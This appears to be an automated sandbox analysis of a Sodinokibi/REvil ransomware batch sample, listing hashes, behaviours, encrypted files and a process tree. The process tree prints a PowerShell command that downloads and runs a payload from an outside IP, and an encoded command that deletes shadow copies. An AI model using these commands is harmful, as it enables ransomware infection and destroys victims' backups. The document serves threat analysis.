Analysis
-
max time kernel
39s -
max time network
59s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
02-06-2020 10:10
Static task
static1
Behavioral task
behavioral1
Sample
7dd11380f39c84448a7000c280f12a78.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
7dd11380f39c84448a7000c280f12a78.bat
Resource
win10v200430
General
-
Target
7dd11380f39c84448a7000c280f12a78.bat
-
Size
219B
-
MD5
694736c7cc588c0f7d4fea15b4f4e074
-
SHA1
322715308f98b4e097a6e8eb88c84cd75e6dffa3
-
SHA256
45b6d83a99693328a71a689d57f8b722e4e74c34b984569bec15e1108852bebc
-
SHA512
c93891f9542c5b111d290df367ff1019cc46f5b23f32df4b83989ba23a79215906029cbe2568c45f4226e650d3c55e50dcf6a5dd6fb382721e99f6da47bdd3d8
Malware Config
Extracted
http://185.103.242.78/pastes/7dd11380f39c84448a7000c280f12a78
Extracted
C:\7vaglni2z0-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/BD0ED380483BE43E
http://decryptor.cc/BD0ED380483BE43E
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1540 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1416 wrote to memory of 1540 1416 cmd.exe powershell.exe PID 1540 wrote to memory of 1032 1540 powershell.exe powershell.exe PID 1540 wrote to memory of 1032 1540 powershell.exe powershell.exe PID 1540 wrote to memory of 1032 1540 powershell.exe powershell.exe PID 1540 wrote to memory of 1032 1540 powershell.exe powershell.exe -
Suspicious behavior: EnumeratesProcesses 77 IoCs
Processes:
powershell.exepowershell.exepid process 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1032 powershell.exe 1032 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 1540 powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7fs3r6d.bmp" powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1540 powershell.exe Token: SeDebugPrivilege 1540 powershell.exe Token: SeDebugPrivilege 1032 powershell.exe Token: SeBackupPrivilege 1776 vssvc.exe Token: SeRestorePrivilege 1776 vssvc.exe Token: SeAuditPrivilege 1776 vssvc.exe Token: SeTakeOwnershipPrivilege 1540 powershell.exe -
Enumerates connected drives 3 TTPs
-
Drops file in Program Files directory 35 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\HideSwitch.3gp2 powershell.exe File opened for modification \??\c:\program files\FindUnlock.midi powershell.exe File opened for modification \??\c:\program files\AddComplete.WTV powershell.exe File opened for modification \??\c:\program files\ClearEnable.vb powershell.exe File opened for modification \??\c:\program files\EnableWrite.kix powershell.exe File opened for modification \??\c:\program files\RenameDebug.css powershell.exe File opened for modification \??\c:\program files\SendEdit.7z powershell.exe File created \??\c:\program files (x86)\7vaglni2z0-readme.txt powershell.exe File opened for modification \??\c:\program files\EditResume.DVR powershell.exe File opened for modification \??\c:\program files\FindSelect.wmf powershell.exe File opened for modification \??\c:\program files\OpenGet.mp3 powershell.exe File opened for modification \??\c:\program files\PingHide.ppt powershell.exe File opened for modification \??\c:\program files\RevokeInvoke.AAC powershell.exe File opened for modification \??\c:\program files\SaveClose.crw powershell.exe File opened for modification \??\c:\program files\SetRestore.xml powershell.exe File opened for modification \??\c:\program files\CompressSend.asx powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\7vaglni2z0-readme.txt powershell.exe File opened for modification \??\c:\program files\CompressRepair.js powershell.exe File created \??\c:\program files\microsoft sql server compact edition\7vaglni2z0-readme.txt powershell.exe File opened for modification \??\c:\program files\OptimizeRemove.xltx powershell.exe File opened for modification \??\c:\program files\PushRepair.clr powershell.exe File opened for modification \??\c:\program files\ResolveSearch.vdw powershell.exe File opened for modification \??\c:\program files\SplitConfirm.snd powershell.exe File opened for modification \??\c:\program files\DismountRestart.vbe powershell.exe File opened for modification \??\c:\program files\PublishStop.pdf powershell.exe File opened for modification \??\c:\program files\ResizeUnlock.m4a powershell.exe File opened for modification \??\c:\program files\SubmitReceive.vdw powershell.exe File created \??\c:\program files\7vaglni2z0-readme.txt powershell.exe File opened for modification \??\c:\program files\RenameExit.jpg powershell.exe File opened for modification \??\c:\program files\WriteShow.DVR-MS powershell.exe File opened for modification \??\c:\program files\BackupTrace.emz powershell.exe File opened for modification \??\c:\program files\MergeInitialize.svg powershell.exe File opened for modification \??\c:\program files\MoveCompress.pptm powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\7vaglni2z0-readme.txt powershell.exe File opened for modification \??\c:\program files\ConvertToProtect.i64 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\7dd11380f39c84448a7000c280f12a78.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/7dd11380f39c84448a7000c280f12a78');Invoke-GLRLIILZKEHV;Start-Sleep -s 10000"2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Sets desktop wallpaper using registry
- Suspicious use of AdjustPrivilegeToken
- Drops file in Program Files directory
PID:1540 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1032
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1776